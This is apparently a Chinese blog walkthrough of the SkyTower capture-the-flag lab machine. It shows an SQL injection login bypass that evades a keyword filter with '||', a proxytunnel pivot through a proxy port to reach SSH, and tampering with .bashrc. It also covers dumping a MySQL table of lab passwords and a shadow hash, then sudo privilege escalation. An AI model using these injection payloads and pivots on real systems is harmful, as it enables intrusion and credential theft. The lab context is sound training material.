Sudo的上级目录提权,SkyTower
主机发现
80探测
端口扫描
目录扫描,没有任何可以利用的信息
admin’ and 1=1 –+
sql注入语法错误,存在sql注入漏洞
万能密码没有用(admin’ or 1=1 –+),发现对or,and,– ,=进行了过滤,只剩下了这些
号测试,没有过滤
那么还有一种写法,就是|| 用这个代替or
登录成功
得到了ssh的账号密码,john / hereisjohn
但是前面我们的22ssh端口是关闭的,该怎么办呢?
3128这个端口呢是一个代理的端口,所以我们用如下代理进行连接ssh
这里我们要用到一个叫代理跳转,现在我们设置一下代理
proxytunnel -a 6666 -p 192.168.111.154:3128 -d 192.168.111.154:22
新建一个终端,,连接本地的6666端口,这时候就成功连接了代理的ssh,但是自动断开了
ssh john@127.0.0.1 -p 6666
这里尝试执行命令,成功,但是会自动断开连接
反弹shell试试
查看当前登录的配置文件
ssh john@127.0.0.1 -p 6666 -t "cat .bashrc"
删除最后一行,还是不行哈,还是有这个东西(exit)
ssh john@127.0.0.1 -p 6666 -t "sed -i '$d' .bashrc"
那么就全部复制到一个文件里面,在kali中
把原来的删了,再使用wget下载
这时候再登录,就成功了
内网信息收集
sudo,SUID
没有思路了就去网站的根目录,看源码
并且进程中还有一个mysql
root/root,登录mysql
三个用户的邮箱和密码都知道了
mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable |
+----+---------------------+--------------+我们切换用户sara,Funds have been withdrawn,资金已被撤回
william用户鉴权失败
登录看看,还是要ssh登录哈
和刚刚一模一样
从kali中下载这个bash文件
登录成功
sudo能用
那么久利用它的accounts目录,进行提权,查看shadow密码文件,这东西肯定加了盐的,很难破解出来
$6$rKYhh57q$AVs1wNVSbE5K.IU1Wp9l7Ndg3iPlB7yczctQD6OL9fBZir2ppGDA6v0Vx17xjg.b3zu6mkAVpEN2BuG3wvS2l/
这时候可以直接用sudo查看flag
提权成功!
往期推荐
不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学
ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略
【oscp】vulnerable_docker,三种代理方法打入内网
【内网渗透】CobaltStrike与MSF联动互相上线的方式
本站小部分内容转载于互联网,如有侵权还请联系
暂无评论内容